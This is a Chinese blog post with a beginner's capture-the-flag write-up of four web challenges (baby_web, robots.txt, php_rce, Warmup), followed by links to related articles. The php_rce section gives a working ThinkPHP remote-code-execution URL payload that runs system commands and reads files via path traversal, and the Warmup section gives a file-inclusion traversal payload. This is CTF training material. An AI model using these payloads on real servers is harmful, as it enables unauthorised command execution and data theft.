攻防世界进阶部分web题(baby_web,Training-WWW-Robots,php_rce,Warmup)

最新推荐文章于 2022-06-17 20:13:40 发布
最新推荐文章于 2022-06-17 20:13:40 发布
阅读量507 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51283187/article/details/110306209
版权

一、baby_web
在这里插入图片描述
点开题目链接得到在这里插入图片描述

题目描述:想想初始页面是哪个
因为初始页面是index.php
所以想到将http://220.249.52.133:50436/1.php改成http://220.249.52.133:50436/index.php
但是改完之后访问不了所以用Brupsuite抓包试试看
在这里插入图片描述
将1.php改成index.php 点击发送,得到新的数据
在这里插入图片描述
flag is hidden!
在头部找到flag
在这里插入图片描述
二、Training-WWW-Robots
点击链接后得进入这个页面在这里插入图片描述
关于robot协议在这位大佬的博客里有介绍
robot协议的相关知识
在网址后面加上/robots.txt得到页面
在这里插入图片描述
得到提示:不允许访问/f10g.php
(此地无银三百两,所以我们就访问/f10g.php)
把robots.txt改成/f10g.php
得到flag在这里插入图片描述
三、php_rce
点开链接进入页面在这里插入图片描述
上网百度发现有rce漏洞,看了别人的wp知道可以通过payload /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls列出当前目录
(刚接触不是很懂,只知道ls是列出所有目录的意思,是在学DOS命令的时候第一次看到的)
于是得到这个页面在这里插入图片描述
通过尝试访问上级目录得到不同的提示,一直往上走
http://220.249.52.133:31007/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20…/…/…/…/…/
得到有关flag的提示在这里插入图片描述
用cat命令读取
http://220.249.52.133:31007/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20…/…/…/flag
在这里插入图片描述
得到flag
————————————————————————————————
附加一道buuctf的web
Warmup
在这里插入图片描述

打开页面后得到一张滑稽的图片,想到在bugku的签到题,F12查看源代码
在这里插入图片描述

得到提示source.php,于是在网址后加上/source.php
在这里插入图片描述

有些函数看不懂,但是看到有hint.php想到去访问看看暗示了什么
在这里插入图片描述
flag写成了ffffllllaaaagggg,也许是一个提示,也许是多层目录下查找
查了不懂的函数稍微看得懂代码表达的意思
所以构造payload,得到/source.php?file=hint.php?../…/…/…/…/…/ffffllllaaaagggg
在这里插入图片描述

得到flag: flag{27587f7e-330a-4013-a2d1-d642f162b884}

影色
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
webdev-training:这是我的培训测试库
02-10
webdev-training:这是我的培训测试库
攻防世界 Web Training-WWW-Robots
MrTreebook的博客
03-12 244
攻防世界 Web Training-WWW-Robots1.打开网址 1.打开网址 大概意思是说需要查看robobs协议 地址栏直接输入robots.txt 看到fl0g.php是不可抓取的 但是丝毫不影响我访问 直接访问
攻防世界web进阶Training-WWW-Robots
gongjingege的博客
07-07 242
目没有描述,但是从这个的名字可以看出所讲的是robots协议 这里讲的就是robots机器查询的标准和网站所允许检索的范围 所以直接在地址栏/robots.txt 在这里发现了flag的文件 访问后得到flag 2020.7.7 公瑾 ...
攻防世界Training-WWW-Robots
qq_44111753的博客
11-14 304
WP 攻防世界 Training-WWW-Robots 目 writeup 很明显,查看robots.txt文件 提示查看fl0g.php文件 得到flag了~
SMBGhost_RCE_PoC-master.zip
06-11
中的"SMBGhost_RCE_PoC-master.zip"是一个压缩包文件,其中包含了与名为"SMBGhost"的安全漏洞相关的远程代码执行(RCE)的概念验证(PoC)代码。这个漏洞被称为CVE-2020-0796,它是在服务器消息块版本3(SMBv3)...
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter未授权RCE(CVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
fastjson_rce_tool-master.zip
05-14
《深入解析Fastjson RCE漏洞及利用工具》 Fastjson是阿里巴巴开源的一个高性能的JSON库,广泛应用于Java项目中,由于其高效的解析速度和简洁的API设计,深受开发者喜爱。然而,随着其广泛应用,安全也逐渐浮出...
f5_rce_poc:cve-2021-22986 f5 rce扩展批量检测poc
03-25
python3 f5_rce.py -u 指定目标URL -f 批量检测文件 -c 执行命令 效果如下所示: PS:输出不够美感,我会修改的 :beaming_face_with_smiling_eyes: 问 该POC目前只能支持部分命令,执行history , ls等失败,原因...
攻防世界Training-WWW-Robots
qq_58970968的博客
10-31 466
根据目提示直接构造payload /robot.txt ,课看到/fl0g.php,继续构造就可看到flag; 总结:robots.txt 文件是一个文本文件,使用任何一个常见的文 本编辑器,比如 Windows 系统自带的 Notepad,就可以创 建和编辑它[1] 。robots.txt 是一个协议,而不是一个命令。 robots.txt 是搜索引擎中访问网站的时候要查看的第一个 文件。robots.txt 文件告诉蜘蛛程序在服务器上什么文件 是可以被查看的 ...
攻防世界Training-WWW-Robots(web进阶
my_name_is_sy的博客
06-17 609
考察robots文件。
攻防世界web高阶1分baby_web
qq_45791542的博客
07-30 171
首先看目所给的提示 注:这里提示初始页面,就想到了index.php 打开目 打开index.php,发现又跳转1.php,按下F12,查看数据包 找到flag
攻防世界robots
知足且坚定,温柔且上进
01-21 1852
打开页面发现啥也没有 查看源码: 提示flag is not here. 目是关于robots协议的,所以用御剑扫一下目录 果真,打开robot.txt: 发现“f1ag_1s_h3re.php” 刚开我是直接在原地址后面加上f1ag_1s_h3re.php,没有flag出现 于是更改了一下 拿到flag. 我百度了一下robots协议,原来disallow是该协议的文件写法。 ...
Training: WWW-Robots (HTTP, Training)
Howie‘s Blog
07-06 1591
Training: WWW-Robots (HTTP, Training) 目描述 In this little training challenge, you are going to learn about the Robots_exclusion_standard. The robots.txt file is used by web crawlers to check if they ...
攻防世界Web高手进阶部分
lalala1031的博客
11-29 247
攻防世界Web高手进阶部分baby_web 首先是观察目给出的信息。 目提示到初始页面(其实一开始,我是没注意到的,我是先进入了网址,然后又一头雾水的出来),然后就去查了网站初始页面的性质 就是一般首页的文件名都为index、default、main或portal加上扩展名。 进入场景发现该网址的格式不符合,那就改吧,先尝试把1.php改为index.php,改了之后发现还是跳回了1.php,但是在网络这出现了一个新的包。 点进去,一不小心就发现了隐藏的flag。 flag{very_ba
PHP网站robots协议
XiongAshao的博客
07-17 207
在网站根目录会有一个robots.txt文件 User-agent: Baiduspider // Allow: /index.html Disallow: / 用几个最常见的情况,直接举例说明: 允许所有SE收录本站: robots.txt为空就可以,什么都不要写。 禁止所有SE收录网站的某些目录: User-agent: * Disallow: /目录名1/ Disallow: /目录名2/ Disallow: /目录名3/ 禁止某个SE收录本站,例如禁止百度: User-agen
robots
he_stand的博客
03-16 178
WriteUp 1.目名称 robots 2.难度系数 简单 3.目来源 Cyberpeace-n3k0 4.目描述 X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 http://111.198.29.45:44532/ 5.解步骤 5.1打开网址 显示空白页面 5.2 查看源代码 没有任何信息,目提示robots协议,尝试访问网站...
PHP解析robots,robots.txt作用及用法
weixin_39546501的博客
03-25 790
robot:中文意思即机器人.robots.txt是一个纯文本文件,在这个文件中网站管理者可以声明该网站中不想被robots访问的部分,或者指定搜索引擎只收录指定的内容。当一个搜索机器人(有的叫搜索蜘蛛)访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,那么搜索机器人就沿着链接抓取。另外,robot...
PHP robot.txt 的正确写法,robot 作为蜘蛛的遵守法则
09-07 508
PHP robot.txt 的正确写法,robot 作为蜘蛛的遵守法则,里面有禁止拜访的路径,以及提供sitemap的路径,方便蜘蛛采集。 这里我仅仅提供zblog版本,其他自行参考! 例子如 User-agent: * Disallow: /zb_users/ Disallow: /zb_system/ Disallow: /MemberCenter Sitemap:http://meishi/sitemap_index.xml Sitemap:http://meishih.com/site.
攻防世界php_rce
最新发布
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值